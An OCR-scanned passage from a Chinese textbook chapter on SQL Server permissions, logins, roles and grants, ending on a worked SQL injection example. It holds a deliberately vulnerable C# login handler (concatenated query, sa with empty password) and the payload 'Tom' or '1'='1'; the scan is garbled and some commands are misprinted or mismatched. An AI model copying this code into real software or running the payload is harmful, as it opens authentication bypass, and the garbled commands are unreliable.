阻止 用 户 访问 某 对 象 
既 不 授予 也 不 拒绝 ,但 是 不 具有 访问 权限 ,是 一 种 系统 隐 含 的 默认 的 模式 ,新 创 
建 的 账户 基本 上 都 是 被 赋予 撤 销 权限 


SQL Server 的 授予 权限 是 琶 加 的 (类 似 于 “与 "算法 操作 )。 例 如 ,A 表 有 a,b,c,d 四 个 
列 ,Tom 被 授予 访问 其 中 的 a,b,c 三 列 的 权限 ,另外 他 还 是 Power 组 的 成 员 ,Power 组 有 访 
问 A 表 的 所 有 列 的 权限 ,那么 Tom 也 具有 访问 d 列 的 权限 。 对 于 拒绝 访问 来 说 , 它 的 原则 
就 是 “ 非 " 算 法 操作 ,例如 ,Tom 属于 Power 组 ,该 组 具有 访问 A 表 所 有 列 的 权限 ,但 是 Tom 
被 拒绝 访问 该 表 , 根 据 “ 非 "算法 ,那么 他 就 不 能 访问 A 表 。 如 果 Power 组 可 以 访问 A 表 的 
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其 中 d 列 ,Tom 被 拒绝 访问 该 列 , 那 么 Tom 也 不 能 看 到 这 一 列 的 数据 。 但 是 有 一 个 例外 ， 
如 果 Tom 属于 Sysadmin 成 员 , 那 么 所 有 的 规则 都 不 起 作用 ,因为 Sysadmin 具有 最 高 权限 ， 
可 以 访问 数据 库 的 所 有 对 象 。 

拒绝 访问 有 一 定 的 复杂 度 和 负面 影响 ,此 类 操作 会 造成 关联 效应 。 对 于 具有 权限 继承 
这 类 复杂 关系 的 情况 ,拒绝 操作 的 结果 可 能 会 比较 复杂 ,所 以 采用 撤销 权限 是 一 种 明智 的 选 
择 , 累 加 安全 性 比 起 * 非 ?操作 更 容易 预见 结果 。 例 如 Tom 用 户 具 有 创建 用 户 的 权限 ,并 且 
他 创建 了 不 少 用 户 , 下 级 用 户 继承 了 Tom 账户 的 很 多 权限 ,现在 Tom 要 离职 了 ,他 的 账户 
不 能 再 拥有 数据 库 访问 权限 ,但 是 他 创建 的 下 级 用 户 权 限 不 变 , 如 果 采 用 拒绝 权限 操作 , 那 
么 他 的 下 级 用 户 访问 数据 库 时 可 能 会 出 现 各 种 问题 。 然 而 如 果 采 用 撤销 权限 操作 ,那么 他 
的 下 级 用 户 则 不 受 影响 。 

权限 继承 的 核心 是 使 用 GRANT 的 WITH GRANT 命令 选项 使 用 户 能 够 访问 某 对 象 ， 
并 且 允 许 该 用 户 授 权 其 他 用 户 访问 该 对 象 。 例 如 使 用 WITH GRANT 选项 授予 Tom 访问 
A 对 象 的 权限 : GRANT EXECUTE ON 对 象 A To Tom WITH GRANT OPTION ,那么 
Tom 就 会 具有 使 用 GRANT 的 命令 向 其 他 人 授予 访问 对 象 A 的 权限 。 如 果 撤 销 了 Tom 
访问 对 象 A 的 权限 ,那么 他 的 下 级 用 户 依然 可 以 访问 对 象 A, 除 非 使 用 撤销 命令 时 加 上 
CASCAD 参数 ; REVOKE EXECUTE ON 对 象 A To Tom CASADE。 权 限定 义 数据 存放 
在 数据 库 的 Syspermissions 表 中 ,如 果 想 知道 某 个 用 户 具有 哪些 权限 ,不 必 去 管理 器 中 逐个 
查看 ,可 以 查询 Sysprotects 表 , 其 中 的 ProtectType 列 存放 GRANT 权限 值 ,通常 用 204、 
205 分 别 表示 撤销 和 授予 权限 ,206 表示 拒绝 权限 。 如 果 执 行 了 REVOKE 操作 ,那么 此 表 
中 就 不 会 存在 关于 该 对 象 的 权限 记录 。 如 果 想 查询 Tom 用 户 对 A 对 象 的 权限 设置 ,可 以 
运行 语句 : 

SELECT x From (Select 0BJECT_NAME(id) as 对 象 名 ,USER_NAME(uid) as 用 户 名 ,ProtectType， 

Action,USER_NAME(Grantor) as 所 有 者 From sysprotects Where id = Object_id( 'A')) DERIVEDTBL 

Where( 用 户 名 = 'Tom') 


就 可 以 看 到 查询 结果 如 表 7.2 所 示 。 
表 7.2 查询 结果 显示 


对 象 名 用 户 名 ProtectType Action 所 有 者 
A Tom 205 193 dbo 


SQL Server 的 权限 模型 当然 不 能 少 了 角色 应 用 ,SQL Server 角色 分 为 服务 器 角色 和 数 
据 库 角色 。 角 色 为 权限 管理 提供 了 高 效 的 手段 ,简化 了 权限 设置 的 工作 量 和 复杂 度 。 用 户 
只 需 设置 角色 的 权限 ,然后 把 相应 的 用 户 或 组 加 入 到 角色 中 就 可 以 使 用 户 取 得 与 角色 一 样 
的 权限 。 

用 户 必须 经 常 查看 Public 角色 。 某 个 用 户 被 授予 访问 数据 库 的 权限 后 ,这 个 用 户 就 会 
被 系统 放 到 Public 角色 中 ,并 且 不 能 从 该 角色 中 删除 ,而 且 此 用 户 将 继承 Public 的 所 有 权 
限 。 最 好 不 要 更 改 Public 角色 的 权限 ,因为 如 果 授 予 系 统 默 认 外 的 某 对 象 权 限 ,将 会 无 法 
显 式 的 授予 用 户 访问 该 对 象 的 权限 。 如 果 拒 绝 Public 的 权限 ,那么 所 有 的 用 户 权 限 都 被 拒 
绝 , 当 然 Sysadmin 角色 的 成 员 除 外 。 
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建议 经 常 检查 Guest 账户 的 权限 ,看 它 有 没有 被 授予 访问 数据 库 的 权限 。 很 多 攻击 者 
都 会 利用 到 Guest 账户 。 

列 级 和 行 级 权限 是 SQL Server 权限 模型 中 粒度 最 细 的 安全 性 手段 。 所 谓 行 级 ,是 对 于 
数据 库 表 的 水 平 划 分 级 别 而 言 ,而 列 级 就 是 作用 于 数据 列 级 别 。 有 些 数 据 库 表 的 列 数 据 不 
希望 给 某 些 人 看 到 ,那么 就 可 以 执行 GRANT 语句 拒绝 用 户 访问 。 例 如 想 要 拒绝 Tom 访 
问 Test 表 中 的 D 列 , 可 以 访问 A,B,C 列 ,可 以 使 用 下 面 的 语句 : Grant select on Test 
(LA],[LB],[C]) to Tom, 如 果 Tom 执行 查询 select * from Test, 那 么 系统 就 会 报错 ,提示 
DD 列 不 能 访问 。 

要 特别 注意 这 种 列 级 安全 性 引起 的 230 权限 拒绝 错误 ,如 果 程序 中 不 处 理 这 种 错误 的 
话 ,将 会 向 用 户 显 示 上 例 的 错误 信息 ,把 拒绝 权限 的 列 名 透露 出 去 ,别有用心 的 人 会 使 用 
SQL 注入 式 攻击 继续 探测 ,取得 更 多 的 信息 ,甚至 取得 sa 的 权限 ,破坏 系统 。 

对 于 行 级 安全 性 ,SQL Server 并 没有 内 置 手 段 。 需 要 通过 自 定义 的 存储 过 程 、 视 图 或 
函数 来 实现 。 一 个 很 简单 的 例子 就 是 在 表 中 设立 一 个 权限 字段 , 另 建新 表 存 储 用 户 和 对 应 
的 权限 值 。 如 果 记 录 中 的 权限 字段 值 允许 用 户 访问 , 则 通过 检测 ,否则 提示 错误 。 


7.3 管理 SQL Server 的 安全 性 


SQL Server 数据 库 和 大 多 数 数据 库 管理 系统 一 样 ,也 是 运行 在 特定 操作 系统 之 上 的 应 
用 程序 。SQL Server 的 安全 性 机 制 可 以 划分 成 以 下 四 个 等 级 。 

。 客户 端 操作 系统 的 安全 性 。 

。 SQL Server 的 登录 安全 性 。 

。 数据 库 的 使 用 安全 性 。 

。 使 用 数据 库 对 象 的 安全 性 。 

每 个 安全 等 级 就 像 飞机 场 的 安检 通道 一 样 ,每 个 用 户 要 想 通过 ,都 必须 表明 自己 的 身份 
和 权限 ,只 有 符合 条 件 的 人 员 才 能 通过 。 


1. 操作 系统 的 安全 性 


在 用 户 对 SQL Server 数据 库 进行 访问 时 ,用 户 首先 要 获得 在 SQL Server 服务 器 或 一 
台 远程 计算 机 上 的 使 用 权限 。 一 般 情况 下 ,不 允许 用 户 直接 登录 SQL Server 服务 器 所 在 的 
计算 机 进行 操作 ,所 以 一 台 远 程 计 算 机 是 否 被 允许 连接 SQL Server 服务 器 就 变 得 十 分 重 
要 。 相 应 的 在 配置 SQL Server 服务 器 时 ,操作 系统 的 安全 性 就 显得 更 加 重要 ,但 同时 也 加 
大 了 管理 数据 库 的 难度 。 


2. SQL Server 服务 器 的 安全 性 


SQL Server 的 服务 器 的 安全 性 是 建立 在 控制 服务 器 登录 的 用 户 名 和 口令 上 的 。SQL 
Server 采用 了 集成 Windows NT 登录 和 SQL Server 登录 两 种 方式 。 选 择 和 管理 适当 的 
SQL Server 登录 方式 是 SQL Server 数据 库 安全 性 的 重要 一 环 。 选 择 登录 模式 的 信息 在 安 
装 SQL Server 数据 库 时 会 进行 提示 ,在 本 书 的 实验 部 分 的 相应 章节 会 给 出 相关 的 操作 
截图 。 
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SQL Server 数据 库 默 认 安 装 了 许多 固定 的 服务 器 角色 。 这 些 角色 可 供 数 据 库 管 理 员 
进行 权限 的 分 配 。 有 关 角 色 的 设置 问题 ,在 7. 3. 5 节 中 有 详细 描述 。 


3. 数据 库 的 安全 性 


每 一 个 用 户 正常 连接 并 打开 数据 库 服 务 器 时 ,都 会 自动 转 到 默认 的 数据 库 上 ,通常 情况 
下 ,用 户 连 接 的 默认 数据 库 是 Master 数据 库 。 数 据 库 管理 员 有 权利 修改 自己 和 其 他 用 户 登 
录 时 的 默认 数据 库 。 由 于 Master 数据 库 保存 着 大 量 系统 信息 ,一 旦 Master 数据 库 受 到 损 
坏 , 将 导致 无 法 正常 访问 数据 库 。 所 以 建议 管理 员 在 建立 新 的 用 户 时 ,不 要 将 默认 数据 库 设 
置 为 Master 数据 库 ,而 应 根据 用 户 的 实际 需要 ,设置 相应 的 数据 库 访问 权限 。 因 为 级 别 越 
低 的 用 户 对 系统 造成 的 危害 也 越 小 。 


4. 数据 库 对 象 的 安全 性 


数据 库 对 象 的 安全 性 是 核查 用 户 权限 的 最 后 一 道 防线 。 默 认 情 况 下 ,只 有 数据 库 的 创 
建 者 拥有 对 数据 库 对 象 的 访问 权限 ,其 他 用 户 要 想 访问 该 数据 库 中 的 对 象 ,必须 由 数据 库 拥 
有 者 为 其 指定 对 哪些 对 象 有 何 种 操作 权限 。 


7.3.1 SQL Server 标准 登录 模式 


如 果 采 取 了 SQL Server 提供 的 标准 登录 模式 来 连接 数据 库 , 则 用 户 必须 拥有 一 个 合 
的 用 户 名 和 和 密码。 在 SQL Server 数据 库 中 ,密码 可 以 设置 为 空 。 网 络 上 探测 数据 库 空 密码 
的 扫描 程序 很 多 ,所 以 不 建议 使 用 空 密码 。 

用 户 可 以 使 用 标准 的 SQL 语法 创建 一 个 用 户 ,具体 语 法 如 下 : 

SP_ADDLOGIN [@loginame = ] 'login' 

[,[@passwd = ] 'password'] 

[,[@defdb = ] 'database'] 

[,[@deflanguage = ] 'language'] 

[L,[@sid = J'sid'] 

[,[@encryptopt = ] 'encryption option'] 

其 中 ,@loginame 为 登录 用 户 名 ,在 同一 数据 库 服 务 器 上 登录 的 用 户 名 必须 是 唯一 的 ; 
@passwd 为 登录 用 户 的 密码 ; @defdb 为 新 建立 用 户 所 能 访问 的 默认 数据 库 名 称 , 如 果 不 
设置 此 参数 , 则 用 户 登录 时 默认 连接 的 就 是 Master 数据 库 ,所 以 建议 一 定 要 设置 这 个 参数 ; 
@deflanguage 为 默认 的 语言 ,这 个 参数 可 以 忽略 ; @sid 为 用 户 的 唯一 标识 符 , 如 果 用 户 忽 
略 此 参数 ,系统 会 为 用 户 创建 一 个 未 使 用 过 的 唯一 标识 符 , 所 以 此 参数 通常 也 可 以 忽略 ; 
@encryptopt 为 是 否 进 行 加 密 , 当 等 于 skip_encryption 时 ,对 密码 不 进行 加 密 , 当 等 于 
NULL 时 ,系统 默认 的 值 ,对 密码 进行 加 密 。 

如 创建 一 个 名 叫 cai, 密 码 为 123 ,默认 数据 库 为 testdatabase 的 账号 的 实例 如 下 。 

EXEC sp_addlogin "cai'"，'123 ' ，testdatabase " 

Go 


建立 好 的 账号 还 可 以 进行 修改 ,用 户 可 以 使 用 系统 存储 过 程 SP_DEFAULTDB 来 修改 
登录 用 户 默认 连接 的 数据 库 名 称 , 具 体 语法 如 下 : 
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EXEC sp_defaultdb cai Master 
Go 


用 户 也 可 以 使 用 系统 存储 过 程 SP_PASSWORD 来 修改 登录 的 密码 ,具体 语法 如 下 : 
EXEC SP_PASSWORD "old_password", "new_password" ,"login_name" 

如 果 用 户 此 时 使 用 的 是 管理 员 权 限 ,可 以 不 输入 old_password, 具 体 语 法 如 下 。 
Sp_password NULL," 新 密码 "," 用 户 名 " 

要 删除 一 个 登录 用 户 , 可 以 使 用 系统 存储 过 程 sp_droplogin, 具 体 语法 如 下 。 


EXEC sp_droplogin cai 
Go 


而 撤销 已 建立 的 用 户 , 则 可 以 使 用 系统 存储 过 程 sp_revokelogin, 具 体 语 法 如 下 。 


EXEC sp_revokelogin cai 
Go 


732 SQL Server 集成 登录 模式 


使 用 SQL Server 集成 登录 模式 时 ,只 要 用 户 所 使 用 的 Windows NT 的 用 户 或 工作 组 
能 够 成 功 登 录 SQL Server 数据 库 所 在 的 Windows NT 服务 器 , 则 SQL Server 就 承认 其 为 
合法 用 户 , 从 而 允许 他 们 使 用 数据 库 中 的 信息 。 这 是 利用 Windows NT 代替 了 SQL Server 
进行 可 登录 审查 工作 。 

可 以 使 用 系统 存储 过 程 sp_grantlogin 来 使 Windows NT 的 用 户 或 工作 组 成 为 SQL 
Server 的 登录 用 户 。 有 具体 语法 如 下 : Sp_grantlogin [@loginame 一] 'login ' 。 

例如 : Sp_grantlogin [network/workgroup], 表 示 把 Windows NT 服务 器 上 的 network 域 
的 工作 组 workgroup 加 入 SQL Server 的 登录 用 户 中 。 

使 用 系统 存储 过 程 sp_grantlogin 的 前 提 是 : 相应 的 工作 组 或 用 户 事先 要 保证 在 
Windows NT 服务 器 上 存在 。 


7.33 使 用 Enterprise Manager 建立 登录 账号 


前 面 两 个 小 节 介 绍 的 都 是 使 用 命令 行 的 方式 来 添加 或 删除 一 些 用 户 , 并 为 用 户 设置 一 
些 访问 权限 。 其 实 SQL Server 还 提供 了 方便 的 图 形 界面 Enterprise Manager。 

用 Enterprise Manager 创建 登录 用 户 的 步骤 如 下 : 

@O 打开 SQL 数据 库 ,选择 SQL Server|Locall“ 安 全 性 ”|“ 登 录 ” 选 项 ,选中 用 户 sa, 右 
击 在 弹出 的 快捷 菜单 中 选择 “属性 ”, 弹 出 如 图 7. 1 所 示 的 “SQL Server 登录 属性 一 新 建 登 
录 ” 对 话 框 ,在 对 话 框 中 输入 登录 的 用 户 名 、 采 用 的 登录 密码 和 默认 数据 库 设置 等 信息 。 

@ 打开 “服务 器 角色 ”选项 卡 ,如 图 7. 2 所 示 , 选 中 相应 的 服务 器 角色 复 选 框 ,为 登录 用 
户 设 置 不 同 的 固定 服务 器 角色 。 

@ 打开 “数据 库 访问 ”选项 卡 , 可 以 对 用 户 访 问 数据 库 的 权限 进行 设置 ,如 图 7. 3 所 示 。 
管理 员 用 户 如 sa 通常 具有 所 有 数据 表 的 访问 权限 ,而 普通 用 户 只 能 访问 其 中 的 一 些 数据 
表 , 但 同时 需要 提醒 的 是 ,无 论 哪 一 级 用 户 ,都 要 选择 db_owner 选项 ,否则 此 用 户 不 能 操作 
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任何 数据 表 。 


5QL Server 登录 尾 性 一 新 建 登录 xl 
常规 | 服务 器 角色 | 数据 库 访问 | 


7.1 SQL 数据 库 用 户 名 、 密 码 和 数据 库 的 设置 


划 
常规 。 服务 器 角色 | 数据 库 访问 | 
服务 器 角色 - 
蕊 服务 器 角色 用 于 对 登录 授予 服务 器 范围 内 的 安全 特权 [6)- 


SQL server 登录 性 性 一 sa | 
常规 | 服务 器 角色 数据 库 访问 | 


DD WB SystemAdministrators 
DD WD Secuiy Administrators 

DD ServerAdministrators 

DD Setup Administrators 

DW Process Administrators 

DW Disk Administators 


DD Database Creators J 
描述 吕 ) 
尾 性 加 


Cm ] cw | Hw | 
图 7.2 设置 服务 器 角色 


图 7.3 设置 用 户 访问 权限 


734 管理 SQL Server 用 户 


在 实现 数据 的 安全 登录 后 ,下 一 步 就 是 检验 用 户 的 数据 库 访 问 权限 。 数 据 库 的 访问 权 
限 是 通过 映射 数据 库 的 用 户 与 登录 账号 之 间 的 关系 来 实现 的 。 数 据 库 的 用 户 是 数据 库 级 的 
安全 实体 ,就 像 登录 账户 是 服务 器 级 的 安全 实体 一 样 。 


添加 数据 库 用 户 可 以 使 用 系统 存储 过 程 SP_GRANTDBACCESS 来 实现 。 具 体 语法 
如 下 : 
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SP_GRANTDBACCESS [ @loginame = ] 'login’' 
[,[@nane in db =] 'name in db'] 

其 中 ,@loginame 为 SQL Server 的 登录 用 户 名 ; name_in_db 为 该 用 户 在 此 数据 库 下 
的 用 户 名 。 此 参数 可 以 忽略 ,默认 情况 下 ,使 用 系统 用 户 名 来 代替 。 

删除 数据 库 用 户 可 以 使 用 系统 存储 过 程 SP_REVOKEDBACCESS 来 实现 。 具 体 语法 
如 下 : 

SP_REVOKEDBACCESS [@name_in db = ] 'name' 

例如 ,删除 用 户 cai 和 数据 库 Northwind 之 间 的 对 应 关系 ,语法 如 下 : 

USE Northwind 

Go 

EXEC SP_GRANTDBACCESS [cai] 

Go 

返回 的 信息 为 : 

User has been dropped from current database 

使 用 Enterprise Manager 管理 数据 库 用 户 的 步骤 如 下 : 

Q@ 打开 SQL 数据库, 选择 SQL Server|Local| "数据库 ?选项 ,在 相对 应 的 数据 库 上 右 
键 单 击 “ 用 户 ”1“ 新 建 数据 库 用 户 ” 选 项 ,弹出 如 图 7.4 所 示 的 新 建 用 户 界 面 。 


数 掺 库 用 户 屋 性 一 新 建 用 户 xl 


Ea 申 录 名 LL} SD -CAN Admmistrator |] | 
用 户 各 QU} SD -CAI NAcmnist oto 


7.4 ”新 建 用 户 界面 


@ 在 “登录 名 ”下 拉 列 表 框 中 选择 要 映射 的 登录 账号 ,然后 在 “用 户 名 ”列表 框 中 输入 相对 
应 的 数据 库 用 户 名 ,最 后 选择 “数据 库 角色 中 人 允许” 栏 中 复 选 框 ,给 该 用 户 分 配 相应 的 角色 。 


735 管理 SQL Server 角色 


角色 是 从 SQL Server 7.0 开始 引入 的 用 来 集中 管理 数据 库 或 服务 器 权限 的 概念 。 
色 可 以 看 作 是 一 组 数据 库 用 户 的 集合 ,类 似 Windows NT 中 的 用 户 组 。 数 据 库 管理 员 先 把 
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操作 数据 库 的 权限 赋予 角色 ,再 把 角色 赋 给 数据 库 用 户 或 登录 账号 ,从 而 让 数据 库 用 户 登录 
账号 拥有 相应 的 权利 。 

在 SQL Server 中 角色 分 为 服务 器 级 的 “固定 服务 器 角色 ”和 数据 库 级 的 “数据 库 级 角 
色 ” 两 种 。 


1. 固定 服务 器 角色 


固定 服务 器 角色 是 SQL Server 在 安装 时 就 创建 好 的 ,用 于 分 配 服 务 器 管理 权限 的 实体 。 
将 某 个 固定 服务 器 角色 分 配给 指定 的 登录 账号 ,可 以 使 用 系统 存储 过 程 SP_ADDSVRROL- 
EMEMBER。 具 体 语 法 如 下 : 


EXEC SP_ADDSVRROLEMEMBER [NetWork/cai], 'sysadmin’' 
Go 


这 个 例子 将 固定 的 服务 器 角色 Sysadmin 分 配给 了 NetWork/cai。 相 应 的 收回 分 配给 
某 登 录 账 号 的 制定 固定 服务 器 角色 的 语法 如 下 : 


EXEC SP_DROPSVRROLEMEMBER [ NetWork/cai], ' sysadmin' 
Go 


同样 的 ,使 用 Enterprise Manager 管理 固定 服务 器 角色 的 步骤 如 下 : 


@O 打开 SQL 数据 库 ,选择 SQL Server|Locall“ 安 全 性 ”|“ 服 务 器 角色 ”选项 ,弹出 如 图 
7.5 所 示 窗 口 ,在 右边 的 列表 中 列 出 了 所 有 固定 服务 器 角色 。 


回 控制 台 根 目录 
日 对 Microsoft 5Q 5ervers 
日 种 5QL5erver 组 
日 昼 ) (oca) (Windows NT) 
由 国 数据 库 


由 国 复制 GSecurity Administrators securityadmin ”可 管理 服务 器 的 登录 。 
白 自 安全 性 Server Administrators serveradmin 。 可 配置 服务 器 范围 的 设置 , 
Setup Administrators setupadmin 。 可 管理 扩展 存储 过 程 。 
六 务 器 角色 ， 名 5ystem Administrators sysedmin 在 安装 5QL 5erver 时 可 执行 任何 操作 。 
由 


全 
外国 支持 服务 
由 - 国 Meta Data Services 
由 已) mw (Windows NT) 


4 lsllal 1 可 
图 7.5 登录 数据 库 的 用 户 列表 
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@ 选中 一 个 固定 服务 器 角色 , 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,弹出 如 图 7. 6 
所 示 的 “服务 器 角色 属性 ”对 话 框 ,对 话 框 中 显示 了 所 有 分 配给 该 固定 服务 器 角色 的 登录 
账号 。 


@ 在 图 7.6 所 示 对 话 框 中 , 单 击 * 添 加 ”按钮 ,弹出 如 图 7.7 所 示 的 “添加 成 员 ” 对 话 框 ， 
在 对 话 框 中 选择 添加 更 多 的 登录 账号 。 


el 
第 规 | 权限 | 


埠 ， sw。 saenaamiuaos 


可 
选择 要 添加 的 登录 ; 
指定 哪些 登录 犀 于 此 安全 性 角色 的 成 员 (S 
3 
攻 
添加 四. 扣除 [) 
mw | 


图 7.6 “服务 器 角色 属性 ”对 话 框 7.7 “添加 成 员 ” 对 话 框 
@ 在 图 7.6 中 , 单 击 “ 权 限 ” 标 签 ,弹出 如 图 7. 8 所 示 的 “权限 ”选项 卡 ,可 以 查看 此 服务 
器 角色 可 执行 的 所 有 命令 。 


CEEI | 


图 7.8 服务 器 角色 的 权限 


2. 数据 库 级 角色 


数据 库 级 角色 提供 了 最 基本 的 数据 库 权限 的 管理 。 将 某 个 登录 账号 加 入 某 个 固定 数据 
库 级 角色 ,可 以 使 用 系统 存储 过 程 SP_ADDSVRROLEMEMBER。 具 体 语法 如 下 : 
USE Master 

Go 


EXEC SP_ADDSVRROLEMEMBER db _ owner ,Tom 
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Go 


这 个 例子 使 登录 账号 Tom 具有 了 数据 库 拥有 者 的 权限 。 

使 用 Enterprise Manager 管理 数据 库 级 角色 的 步骤 如 下 : 

@ 打开 SQL 数据 库 ,选择 SQL Server|Locall “数据 库 ” 选 项 ,打开 一 个 具体 的 数据 库 ， 
单 击 “ 角 色 ” 选 项 ,弹出 如 图 7.9 所 示 窗 口 ,在 右边 的 列表 中 列 出 了 所 有 数据 库 角色 。 


PE GE Ne ASS 
向 Ble acton Yew 工具 D Wndow Hep | = 上 可 1x| 
父 | 用 | 加 |X 旷 国 加 | 岛 | 米 | 洁 即 自转 B 
加 控制 各 根 目录 | 第 色 10 个 项 目 
日 对 Microsoft 5Qt Servers 
日 各 Qserver 组 
日 盈 doca) (Windows NT) 


日 国 数据 库 


图 7.9 数据 库 角色 列表 


@ 布 击 一 个 数据 库 角色 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,弹出 如 图 7. 10 所 示 的 
“数据 库 角色 属性 ”对 话 框 ,对 话 框 中 显示 了 所 有 分 配给 该 数据 库 角色 的 登录 账号 。 

@ 在 如 图 7.9 所 示 窗 口中 , 单 击 “ 添 加 ”按钮 ,弹出 如 图 7. 11 所 示 的 “添加 角色 成 员 ” 对 
话 框 ,在 对 话 框 中 选择 添加 更 多 的 登录 账号 。 


数 需 库 角色 屋 性 一 public 可 


mm | 
[#9 名 称 N} 
pubie 祝 限 忆 | 
SQL Server 支持 两 种 数据 库 角 色 类 型 :标准 角色 ( 包 合成 员 ) 和 应 用 
程序 角色 ( 需要 密码 ) 。 


ET x| 
数据 库 角色 类型: 于 
从 标准 角色 [5 : 
用 guest 


EE 
全 应 用 程序 角 名 四 | 


TEST Cw | 


图 7.10 “数据 库 角 色 属 性 ”对 话 框 图 7.11 “添加 角色 成 员 ” 界 面 
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@ 单 击 如 图 7. 10 所 示 对 话 框 中 的 “权限 ”按钮 ,弹出 如 图 7. 12 所 示 的 对 话 框 ,在 对 话 
框 中 可 以 添加 或 删除 数据 库 级 角色 的 访问 权限 。 


数据 库 角 色 尾 性 一 123 xl 


人 列 出 全 部 对 象 加 ] 
个 羽 列 出 该 第 色 有 具有 权限 的 对 象 L)。 


要 DeleteCatalogs dbo 
要 DeleteMwrchive dbo 
要 DeleteMiBranch dbo 
要 DeleteMiContact dbo 
可 DeleteMiDep dbo 


可 DeleteMwia dbo 
本 6etBranf dbo 
cit 工 - 


Cancel Appy Help 
7.12 ”添加 或 删除 数据 库 角色 的 访问 权限 


736 管理 SQL Server 许 可 


数据 库 许 可 是 通过 权限 管理 实现 数据 库 安全 的 最 后 一 道 防线 。 当 数据 库 对 象 刚 被 创建 
时 ,只 有 数据 库 的 创建 者 可 以 访问 该 数据 库 。 任 何其 他 用 户 想 访问 该 数据 库 必 须 获得 拥有 
者 的 许可 。 拥 有 者 给 指定 的 数据 库 用 户 授予 许可 。 

对 于 数据 库 中 的 数据 表 和 视图 ,拥有 者 可 以 把 Insert、Update、Delete、Select 和 
References 5 种 功能 许可 给 其 他 用 户 。 

在 数据 库 中 为 其 他 用 户 进行 许可 授予 的 语法 如 下 : 

USE Northwind 

Go 

GRANT SELECT 

ON Categories 

TO public 

Go 


GRANT insert,update,delete 
ON Categories 

TO CAI ,YANG 

Go 


这 个 例子 将 从 Northwind 数据 库 的 Categories 表 中 查询 数据 的 许可 授予 public 角色 ; 
将 Categories 表 中 的 插入 、 更 新 、 删 除权 限 许可 授予 CAI 和 YANG。 
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拒绝 某 个 用 户 获得 某 项 许可 的 语法 如 下 : 


USE Northwind 
Go 

GRANT SELECT 
ON Categories 
TO public 

Go 


DENY select, insert ,update, delete 
ON Categories 

TO CAI, YANG 

Go 


使 用 Enterprise Manager 管理 许可 的 步骤 如 下 : 

@O 打开 SQL 数据库, 选择 SQL Server| Local| “数据 库 ” 选 项 ,打开 一 个 具体 的 数据 
库 , 单 击 “ 表 ”选项 ,弹出 如 图 7. 13 所 示 窗 口 ,在 右边 的 列表 中 列 出 了 所 有 该 数据 库 中 的 
数据 表 。 


回 控制 台 根 目录 
日 得 Microsoft 5Q 5ervers 
日 各 5Q&5erver 担 
日 郧 (oca) (Windows NT) 
日 因 数据 / 


田 - 国 

由 

让 

昌国 

田 国 

es 

四 tempdb 

田 加 数据 转换 服务 二 
sk 时 m 盟 


图 7.13 数据 表 的 显示 列表 


@ 选中 一 个 数据 表 , 右 击 , 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,弹出 如 图 7. 14 所 示 
的 对 话 框 ,对 话 框 中 显示 了 该 表 的 一 些 属性 。 

@ 在 如 图 7.14 所 示 的 “ 表 属 性 ”对 话 框 中 , 单 击 “权限 ”按钮 ,弹出 如 图 7. 15 所 示 的 对 
话 框 ,在 对 话 框 中 用 户 可 以 分 配 在 数据 表 对 象 上 可 以 执行 的 操作 许可 。 
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四 
第 规 | 全 文 索引 | 

吧 WN cientinlomaton 权限 P} 

所 有 者 - dbo 


创建 日 期 : 2006-3-20 10:20:45 


Carcel | spy | he | 

图 7.14 “ 表 属性 ”对 话 框 
本 
权限 | 
吉 ao 


人 列 出 全 部 用 户 /用 户 定义 的 数据 库 角色 /pubiiclU] 
个 避 列 出 对 此 对 象 具有 权限 的 用 户 /用 户 定义 的 数据 库 角 色 /pubiiclL)。 


有 广度 据 库 角色/Puble SELECT [INSERT [UPDATE [DELETE EXEC op ] 


Cancel i Help 
图 7.15 设置 用 户 对 表 的 权限 


7.4 针对 SQL Server 的 攻击 与 防护 


针对 SQL Server 的 攻击 主要 来 自 来 两 个 方面 ,一 方面 攻击 者 使 用 SQL 的 服务 器 漏洞 
进行 蠕虫 病毒 的 攻击 , 另 一 方面 攻击 者 利用 网 站 编写 者 的 书写 漏洞 进行 攻击 。 关 于 数据 库 
的 防护 也 是 针对 这 两 方面 展开 的 。 

在 一 些 Web 表单 中 ,用 户 输入 的 内 容 可 能 直接 用 来 构建 SQL 查询 命令 ,如 果 不 加 以 防 
范 ,很 容易 受到 SQL 注入 式 攻击 。SQL 注入 式 攻击 是 攻击 者 把 SQL 命令 插入 到 Web 表单 
的 输入 域 或 页 面 请 求 的 查询 字符 串 中 ,以 便 欺骗 服务 器 并 执行 超越 权限 的 SQL 命令 。 

下 面 是 一 个 常见 的 SQL 注入 式 攻击 的 例子 ,具体 步骤 如 下 : 
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@ 新 建 一 个 login. aspx 登录 页 面 ,页 面 有 两 个 文本 输入 框 txtUserName、txtPassword 
用 来 输入 用 户 名 和 密码 ,添加 一 个 登录 按钮 来 提交 认证 。 

@ 单 击 “ 登 录 ” 按 钮 ,进入 后 台 程 序 界面 login. aspx. cs。 在 按钮 触发 过 程 中 ,根据 文本 
框 动态 生成 SQL 命令 ,并 根据 是 否 返 回 记 录 判 断 登录 是 否 成 功 。 具 体 代码 如 下 : 


private void LoginButton Click(object sender,System. EventArgs e) 
{ 
// 动态 生成 的 SQL 语句 
System. Text. StringBuilder query = new System. Text. StringBuilder 
("Select Count( * ) from users where username = '") 
. Append( txtUserName. Text) 
. Append(" 'and password= '") 
. Append( txtPassword. Text) 
. Append(" '"); 
// 连 接 字符 串 
string ConnectionString = "Server = (local);User id = sa;Pwd= ;Database = Northwind"; 
// 数 据 库 操作 部 分 
System, Data. SqlClient. SqlCommand thisCommand = new System. Data. SqlClient. SqlCommand 
(query. ToString()); 
thisCommand. Connection = new System. Data. SqlClient. SqlConnection(ConnectionString); 
thisCommand. Connection. Open(); 
Int n = (int)thisCommand. ExecuteScalar(); 
thisCommand. Connection. Close(); 
// 验 证 部 分 
If(n! =0) 
{ 
// 验 证 成 功 ,给 用 户 授权 ,并 提示 登录 成 功 
} 
Else 
{ 
// 验 证 失败 ,提示 用 户 重新 输入 
} 
} 


@ 攻击 者 在 输入 用 户 名 时 ,输入 "'Tom'or '1' 三 '1'", 和 密码 框 为 空 , 单 击 “ 登 录 ” 按 钮 。 

四 经 过 SQL 注入 式 攻击 后 生成 的 SQL 命令 变 为 : select * from users where 
username 一 "Tom'or '1' 二 '1'and password 二 '' ,SQL 语句 的 逻辑 含义 就 改变 了 ,服务 器 
执行 的 已 经 不 是 真正 的 身份 认证 ,系统 已 经 错误 地 授权 给 攻击 者 了 。 

